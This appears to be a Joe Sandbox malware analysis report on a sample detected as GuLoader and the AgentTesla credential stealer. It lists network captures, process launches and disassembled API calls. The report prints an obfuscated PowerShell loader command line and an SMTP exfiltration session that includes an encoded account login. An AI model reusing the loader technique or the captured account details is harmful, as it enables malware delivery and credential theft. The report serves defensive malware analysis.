2024-11-05 15:36:55 UTC	1378	IN	Data Raw: a9 de 7d 91 d2 a4 d0 5f 7d 56 75 41 e8 38 87 1b 9f ea 05 26 9c 88 a7 36 43 67 16 00 de db d3 d5 bb 02 bb 9f c6 16 19 40 ff ae 14 42 d2 59 d4 f2 d2 72 f3 e6 0c d2 a9 67 4f 9a d0 b1 82 d5 c4 14 47 52 1f 0f 6d 4e f3 2e 65 66 65 2b f3 df 07 6c cd b0 3a 82 a6 d1 c2 b3 03 64 1d ff 0c 32 dc 88 ef 7d aa 57 bf 7a 59 26 40 3f 6d 84 a0 17 8b 9f ec 44 8c 52 b8 bf d3 1d e0 bb 59 16 29 cf ab 64 33 ed b0 d1 0c 10 0b b3 27 3b 99 d1 51 12 1d 9b 8b 86 fc 13 4c 10 74 64 0a 7a 03 69 b6 8e 0b 90 7a e0 c7 50 94 53 1a ce 49 65 d2 3c 49 ae 22 d7 da b8 e6 b8 00 85 6c 1d 5a 24 64 06 c7 b8 64 a1 71 2c 30 c0 8f 49 1a 66 3e e6 bf 2e 64 98 fb 00 57 a6 0f ab c3 36 a1 b9 49 fc 7a 01 03 9a b4 72 c6 82 91 a7 db c3 c2 2a 61 12 4d dd 37 3a cd bf cf a9 1a 4d ec e7 c8 b0 82 c9 1c 47 82 9c 4c Data Ascii: }_}VuA8&6Cg@BYrgOGRmN.efe+l:d2}WzY&@?mDRY)d3';QLtdzizPSIe<I"lZ$ddq,0If>.dW6Izr*aM7:MGL
2024-11-05 15:36:55 UTC	1378	IN	Data Raw: f5 6b 41 61 28 b5 fe d5 8f 56 e6 bf 8e 7f cc d5 7c 95 1d 70 05 38 77 c9 b6 dc a3 7b 41 e8 e3 b4 27 1e 13 85 b1 f7 e0 8d 70 2c a2 a0 96 43 db 78 08 87 44 5a dc 2c 20 42 bf b2 db 75 94 86 2c e6 6c 3f 77 d4 96 83 7d c4 bb e3 12 e0 9d e1 aa d8 81 36 f8 33 08 58 dd ac e4 77 ac dc f2 2f 55 31 53 c9 a2 a6 2d ba 86 41 12 56 6e fe 91 f3 16 fa ac e2 e4 95 e3 6d 8c bd 4b 85 54 89 b9 7c e3 3c 1a ca cc e2 fe 80 c5 d1 73 4a 44 3f 9a 2d 05 aa 7d c9 b5 7b 1c 54 46 cd df 71 41 da 10 9e 44 d3 bd f7 d2 1b c2 0e c4 ad de 7d 91 d2 21 aa 5e 7d 7a 43 37 e8 3e e2 45 9b ea 0f 0e 7e 86 a7 3c 3e ed 1a 00 da db be d5 bb 02 bb 90 ff 1c 19 be f3 ae 34 63 b2 59 d4 0c 22 73 ca f1 f2 de a9 99 66 9f d0 91 a2 2b c5 2d 02 9c 0f 0f 55 6b 92 2e 65 5e c9 da 0c 20 2d 92 c1 b0 29 92 cb d1 7f b3 Data Ascii: kAa(V\|p8w{A'p,CxDZ, Bu,l?w}63Xw/U1S-AVnmKT\|<sJD?-}{TFqAD}!^}zC7>E~<>4cY"sf+-Uk.e^ -)
2024-11-05 15:36:55 UTC	1378	IN	Data Raw: 6e fb 48 4d 06 fe ff 8a de 77 55 bf bf ff eb a0 7f f6 1e 7c cd b6 7f 8d 85 ea e5 92 54 ea 2a 37 cf c3 54 49 af ef b5 77 a1 a0 6b 5e 64 ff 46 f1 bb 6a a7 c9 82 9a 6f f9 7d 71 f7 7a 01 de 43 c1 5f 6b ba 3c f6 f1 15 e0 e6 33 4f 34 f4 6d de cb 92 f5 14 3f bb f7 d3 99 43 0f 7d 56 e1 f3 4f bf a8 b4 ca f8 fd 21 65 54 a5 36 cd 38 da 4d 86 7e 4d 43 62 57 9f 7f fc de ef a1 ed db 4c ae f7 4f d4 e1 28 f9 e0 c9 f8 5d 50 a3 90 11 79 f2 0b c9 8f d8 31 82 12 db d3 89 11 cb 12 1b b0 77 c4 2f 63 d0 49 37 d4 12 2e 0f 11 35 11 47 cc 8c 7f 83 76 96 97 92 7f 32 de 5e d8 ea 8e fe e7 71 cd b6 dc 5d 8b 4f ea e3 4a d5 12 11 a5 9a f7 e0 8d 8e d3 9a 93 9c 43 db 52 28 ab 45 5a dc d2 d0 4c bd b2 25 87 98 84 0c 84 64 3f 77 2a 69 bb 53 c1 bb e3 ec d1 99 e1 8a aa b9 d7 05 8c e8 75 dd ac Data Ascii: nHMwU\|T7TIwk^dFjo}qzC_k<3O4m?C}VO!eT68M~MCbWLO(]Py1w/cI7.5Gv2^q]OJCR(EZL%d?wiSu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49712	104.26.13.205	443	7048	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-05 15:36:57 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-11-05 15:36:57 UTC	399	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 15:36:57 GMT Content-Type: text/plain Content-Length: 14 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 8dddec2019dba915-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1364&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2818&recv_bytes=769&delivery_rate=2458404&cwnd=186&unsent_bytes=0&cid=399a9f5a0320ab07&ts=430&x=0"
2024-11-05 15:36:57 UTC	14	IN	Data Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 Data Ascii: 173.254.250.76

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 5, 2024 16:37:00.994605064 CET	587	49714	208.91.199.223	192.168.2.8	220 us2.outbound.mailhostbox.com ESMTP Postfix
Nov 5, 2024 16:37:00.995031118 CET	49714	587	192.168.2.8	208.91.199.223	EHLO 116938
Nov 5, 2024 16:37:01.151644945 CET	587	49714	208.91.199.223	192.168.2.8	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Nov 5, 2024 16:37:01.155535936 CET	49714	587	192.168.2.8	208.91.199.223	AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t
Nov 5, 2024 16:37:01.315074921 CET	587	49714	208.91.199.223	192.168.2.8	334 UGFzc3dvcmQ6
Nov 5, 2024 16:37:01.477303028 CET	587	49714	208.91.199.223	192.168.2.8	235 2.7.0 Authentication successful
Nov 5, 2024 16:37:01.479490995 CET	49714	587	192.168.2.8	208.91.199.223	MAIL FROM:<tech1@santonswitchgears.com>
Nov 5, 2024 16:37:01.637973070 CET	587	49714	208.91.199.223	192.168.2.8	250 2.1.0 Ok
Nov 5, 2024 16:37:01.638397932 CET	49714	587	192.168.2.8	208.91.199.223	RCPT TO:<tech1@santonswitchgears.com>
Nov 5, 2024 16:37:01.820481062 CET	587	49714	208.91.199.223	192.168.2.8	250 2.1.5 Ok
Nov 5, 2024 16:37:01.820625067 CET	49714	587	192.168.2.8	208.91.199.223	DATA
Nov 5, 2024 16:37:01.979985952 CET	587	49714	208.91.199.223	192.168.2.8	354 End data with <CR><LF>.<CR><LF>
Nov 5, 2024 16:37:01.980690956 CET	49714	587	192.168.2.8	208.91.199.223	.
Nov 5, 2024 16:37:02.274764061 CET	587	49714	208.91.199.223	192.168.2.8	250 2.0.0 Ok: queued as B3F92500244

Target ID:	0
Start time:	10:36:14
Start date:	05/11/2024
Path:	C:\Users\user\Desktop\REnBTVfW8q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\REnBTVfW8q.exe"
Imagebase:	0x400000
File size:	1'157'372 bytes
MD5 hash:	E6A0BB6BCAF44FBCC341EF4C93482059
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1438403773.0000000002999000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:36:17
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs' ; $Devilkin=$Cephalochorda.SubString(22951,3);.$Devilkin($Cephalochorda) "
Imagebase:	0xe40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1647862127.00000000094F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1647881409.000000000C7EF000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1641405594.0000000006319000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:36:17
Start date:	05/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:36:37
Start date:	05/11/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xda0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2677888739.0000000025194000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2677888739.00000000251BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2677888739.00000000251C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	20.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1358
Total number of Limit Nodes:	24

Executed Functions

Function 00403489 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004034AC
GetVersion.KERNEL32 ref: 004034B2
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
OleInitialize.OLE32(00000000), ref: 00403529
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
CharNextW.USER32(00000000,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594

Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036EB
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403707
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403718
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403720
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403734

Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD

ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 004037FA
CoUninitialize.COMBASE(00000006,?,00000006,00000008,0000000A), ref: 004037FF
ExitProcess.KERNEL32 ref: 00403820
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403833
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403842
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\REnBTVfW8q.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403859
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403875
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,"Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin,00000008,?,00000006,00000008,0000000A), ref: 004038CF
CopyFileW.KERNEL32(00438800,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038E3
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 00403910
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040393F
OpenProcessToken.ADVAPI32(00000000), ref: 00403946
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040395B
AdjustTokenPrivileges.ADVAPI32 ref: 0040397E
ExitWindowsEx.USER32(00000002,80040002), ref: 004039A3
ExitProcess.KERNEL32 ref: 004039C6

Strings

TMP, xrefs: 0040371B
C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles, xrefs: 004037DC
C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles, xrefs: 004036B1, 004037D1, 0040387B, 00403885
NSIS Error, xrefs: 0040354B
TEMP, xrefs: 00403713
1033, xrefs: 0040372F
UXTHEME, xrefs: 004034D9, 004034DE, 004034E4
Low, xrefs: 00403701
.tmp, xrefs: 00403847
C:\Users\user\Desktop, xrefs: 00403852, 00403857, 00403884
Error launching installer, xrefs: 004037B6
SeShutdownPrivilege, xrefs: 00403955
\Temp, xrefs: 004036E5
~nsu, xrefs: 0040382B
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034A0
"C:\Users\user\Desktop\REnBTVfW8q.exe", xrefs: 00403560, 00403566, 0040375C
C:\Users\user\AppData\Local\Temp\, xrefs: 004036C3, 004036C8, 004036DE, 004036EA, 004036F9, 00403706, 00403712, 0040371A, 00403830, 00403841, 0040384C, 00403858, 00403865, 00403874, 00403925
"Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin, xrefs: 00403893

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Processlstrcat$ExitFile$Handle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\REnBTVfW8q.exe"$"Powershell.exe" -windowstyle minimized "$Cephalochorda = Get-Content -raw 'C:\Users\user\AppData\Local\Temp\Polyspondyly\immin$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles$C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 354199918-1526256497
Opcode ID: 4dca7ee7eefcd27b05505b3b4d38c1a9a3124073f478f39867f6758fec60c5f6
Instruction ID: aa49a9b5ba718b736b7abce3970f6df4d0a927ceef10040f9259c4205047f8e0
Opcode Fuzzy Hash: 4dca7ee7eefcd27b05505b3b4d38c1a9a3124073f478f39867f6758fec60c5f6
Instruction Fuzzy Hash: 3DD103B1600311ABD3206F759D45B3B3AACEB4070AF10443FF981B62D2DBBD8D558A6E

Function 00405553 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004055B1
GetDlgItem.USER32(?,000003EE), ref: 004055C0
GetClientRect.USER32(?,?), ref: 004055FD
GetSystemMetrics.USER32(00000002), ref: 00405604
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405625
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405636
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405649
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405657
SendMessageW.USER32(?,00001024,00000000,?), ref: 0040566A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040568C
ShowWindow.USER32(?,00000008), ref: 004056A0
GetDlgItem.USER32(?,000003EC), ref: 004056C1
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004056D1
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004056EA
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004056F6
GetDlgItem.USER32(?,000003F8), ref: 004055CF

Part of subcall function 0040437A: SendMessageW.USER32(00000028,?,00000001,004041A5), ref: 00404388

GetDlgItem.USER32(?,000003EC), ref: 00405713
CreateThread.KERNELBASE(00000000,00000000,Function_000054E7,00000000), ref: 00405721
CloseHandle.KERNELBASE(00000000), ref: 00405728
ShowWindow.USER32(00000000), ref: 0040574C
ShowWindow.USER32(?,00000008), ref: 00405751
ShowWindow.USER32(00000008), ref: 0040579B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057CF
CreatePopupMenu.USER32 ref: 004057E0
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004057F4
GetWindowRect.USER32(?,?), ref: 00405814
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040582D
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405865
OpenClipboard.USER32(00000000), ref: 00405875
EmptyClipboard.USER32 ref: 0040587B
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405887
GlobalLock.KERNEL32(00000000), ref: 00405891
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A5
GlobalUnlock.KERNEL32(00000000), ref: 004058C5
SetClipboardData.USER32(0000000D,00000000), ref: 004058D0
CloseClipboard.USER32 ref: 004058D6

Strings

(7B, xrefs: 00405841
{, xrefs: 004057B9

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: 65755d25ec43e8c4b7471592c12376d51de7d54b52fa0433bd5dbe0fad765625
Instruction ID: f8c5fe522ebc9739dae7df13929d3a15495bf3740f19f89270c8c50aa4207807
Opcode Fuzzy Hash: 65755d25ec43e8c4b7471592c12376d51de7d54b52fa0433bd5dbe0fad765625
Instruction Fuzzy Hash: AFB15870900608FFDB11AFA0DD85AAE7B79FB44354F00847AFA45B61A0CB754E51DF68

Function 00406ABA Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45

Function 004066F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 004066FE
FindClose.KERNEL32(00000000), ref: 0040670A

Strings

xgB, xrefs: 004066F4

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: xgB
API String ID: 2295610775-399326502
Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8

Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871

Memory Dump Source

Source File: 00000000.00000002.1436948290.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1436935337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436964845.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436981211.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437102240.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_REnBTVfW8q.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 20c39e142c52789c8eef78f40019c13669666e558b86cb1136619f829f09591b
Instruction ID: 1506565ccd7b679c7f55cec76d0c208d7a3b57e4c41f2eb52868ec6bdbdc004a
Opcode Fuzzy Hash: 20c39e142c52789c8eef78f40019c13669666e558b86cb1136619f829f09591b
